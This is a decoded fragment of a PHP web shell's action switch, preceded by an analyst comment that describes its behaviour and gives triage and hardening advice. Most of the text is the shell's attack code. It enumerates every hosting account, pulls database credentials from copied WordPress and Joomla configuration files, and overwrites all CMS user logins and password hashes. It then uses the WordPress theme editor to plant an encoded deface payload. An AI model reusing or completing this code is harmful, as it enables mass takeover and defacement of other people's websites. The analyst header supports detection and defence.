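/* Decoded by unphp.net
 *
 * Analyst note: this is a fragment of a PHP web shell's action switch. The
 * decoder output has lost its HTML markup and heredoc bodies and is cut off at
 * both ends, so the text below is not runnable as shown.
 *
 * Behaviour visible in this fragment:
 *  - Lists the zone files in /var/named and maps each domain to an account via
 *    the owner of /etc/valiases/<domain>; one branch iterates /etc/passwd
 *    entries instead when that file is readable.
 *  - Reads per-account CMS configuration copies from a `pee/` directory beside
 *    the script (<account>-WordPress.txt, <account>-Joomla.txt) and extracts
 *    the database host, user, password, name and table prefix from them. How
 *    those copies are produced is outside this fragment (cms_add() is defined
 *    elsewhere).
 *  - Connects with the extracted credentials and runs UPDATE on <prefix>users
 *    with no WHERE clause, so every row ends up with the same login and the
 *    same password hash.
 *  - case 'wp_def' then signs in through wp-login.php and submits new content
 *    for 404.php / archive.php / comment.php via wp-admin/theme-editor.php.
 *
 * Triage pointers: an unexpected `pee/` directory or `pee.tmp` file under a
 * web root; CMS user tables in which all rows share one login and one hash;
 * wp-login.php and theme-editor.php POSTs that (likely) originate from the
 * server's own address.
 *
 * Hardening: keep CMS configuration files unreadable by other hosting
 * accounts, rotate any database credentials found in copied configs, and set
 * DISALLOW_FILE_EDIT in WordPress so the theme editor is unavailable.
 */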
?>
CMS | '; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'
CMS | '; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } break; ################MASS DEFACE case 'pass_change': echo <<
DOMAIN | USER | CMS | STATUS | '; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | success.. | '; }else{ echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | mysql fail | '; } } elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($user); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $pwd = md5($npass); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||||||||||||||||||||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } } ######### } } } } elseif(is_readable("/etc/passwd")){ echo'
DOMAIN | USER | CMS | STATUS | '; foreach($etcz as $etz){ $etcc = explode(":",$etz); if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($user); mysql_select_db($dbname,$link) ; $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); error_reporting(0); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | WordPress | mysql fail | '; } } elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo '|||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | success.. '; }else{ echo ' | |||||||||||||
'.$domain.' | '.$owner['name'].' | Joomla | mysql fail | '; } } } ######### } } } } break; ################MASS DEFACE case 'wp_def': ################### USER & PASS ################ $user = 'admin'; $pass = 'foo'; ################################################ echo <<
DOMAIN | USER | CMS | STATUS | DEF URL | '; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '|||
'.$domain.' | '.$owner['name'].' | WordPress | [#]
User Pass Changed '; $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1'; $def=" echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."'))); exit; ?>"; $buffer0 = CurlPage($site_url.'/wp-login.php',$post); if(!preg_match("/logout/i",$buffer0)) { echo "[X] FAILED TO LOGIN "; }else{ echo "[#] LOGGED IN :D "; $urlz = $site_url."/wp-admin/theme-editor.php"; $themeditor = CurlPage($urlz,$cookie,null); if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened | "; } else { echo "error
opening theme edtitor!"; }
$nola = explode(Chr(10),$themeditor);
foreach($nola as $nline){
if(preg_match('%theme-editor\.php\?file=%',$nline) &&
preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
$modify[Find($nline,'(',')')] = Find($nline,'';
if(is_array($modify)){
foreach($modify as $met=>$indfile){
$nri = str_replace('.','_',$met);
$nri = "n".$nri;
$indfile =str_replace("&","&",$indfile);
$url = trim($site_url."/wp-admin/".$indfile);
$themepage = CurlPage($url,"");
$_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
$_file = Find($themepage,'name="file" value="','"');
$nfile = explode('themes',$_file);
$jfile = $site_url."/wp-content/themes".end($nfile);
//Update file
$url = $site_url."/wp-admin/theme-editor.php";
$postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
$themedied = CurlPage($url,$postme);
if(preg_match('%||||
'.$domain.' | '.$owner['name'].' | WordPress | [x] mysql fail | '; } }}}}} break; // Uploader case 'uploader': echo '